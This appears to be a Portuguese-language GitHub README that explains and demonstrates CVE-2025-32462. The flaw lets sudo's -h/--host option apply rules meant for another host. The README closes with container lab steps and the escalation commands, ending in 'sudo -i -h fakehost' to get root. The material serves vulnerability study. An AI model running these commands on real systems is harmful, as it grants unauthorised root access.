
demonstração do cve-2025-32462'

sudo/NEWS at SUDO_1_8_8 · sudo-project/sudo · GitHub
Na documentação do sudo -h (--host) está escrito que -h só pode ser usado com -l. Em atualizações posteriores, permitiu-se que sudo -h pudesse ser usado com -e, -i, etc.
sudo --host(-h) <username> -l(--list)
/etc/sudoer.d é usado para verificar quais permissões um usuário possui no sistema. Essa permissão pode ser ultrapassada, permitindo que um usuário eleve seus privilégios de um sistema para os que ele poderia ter em outro. Isso afeta especialmente sistemas que compartilham um único arquivo de configuração sudoers entre vários computadores ou que usam diretórios de usuário baseados em rede (como LDAP) para fornecer regras sudoers.
Em resumo: a opção h/--host do sudo não segue o princípio do menor privilégio e não valida os limites das regras de host em cenários que não sejam -l (como execução de comandos). Um atacante pode configurar regras maliciosas no arquivo /etc/sudoer.d.
Afeta principalmente os sistemas de administradores que usam o mesmo arquivo sudoers em várias máquinas.
O ataque precisa atender a dois requisitos:
O atacante obtém um usuário autenticado
O sistema não está na configuração padrão, dependendo de regras adicionais presentes no arquivo sudoers
Exemplo:
O arquivo sudoers contém regras que definem as permissões desse usuário em diferentes sistemas.
Alice hostA: some Privilege
Bob hostB: some Privilege
Bob logs into hostA, then run command sudo -h hostB commandA
git clone https://github.com/SpongeBob-369/cve-2025-32462.git
cd cve-2025-32462
chmod +x run.sh
./run.sh
# after entering the contain Ubuntu
sudo -l
# then prompt you to enter your password, but "we" don't know.
sudo -l -h fakehost # Check the permissions user ubuntu have in host named fakehost
sudo -i -h fakehost # get root